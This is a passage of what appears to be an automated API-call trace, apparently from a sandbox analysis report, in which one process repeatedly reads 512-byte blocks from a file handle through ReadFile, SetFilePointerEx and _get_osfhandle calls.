lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 
[0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, 
lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, 
lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 
[0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
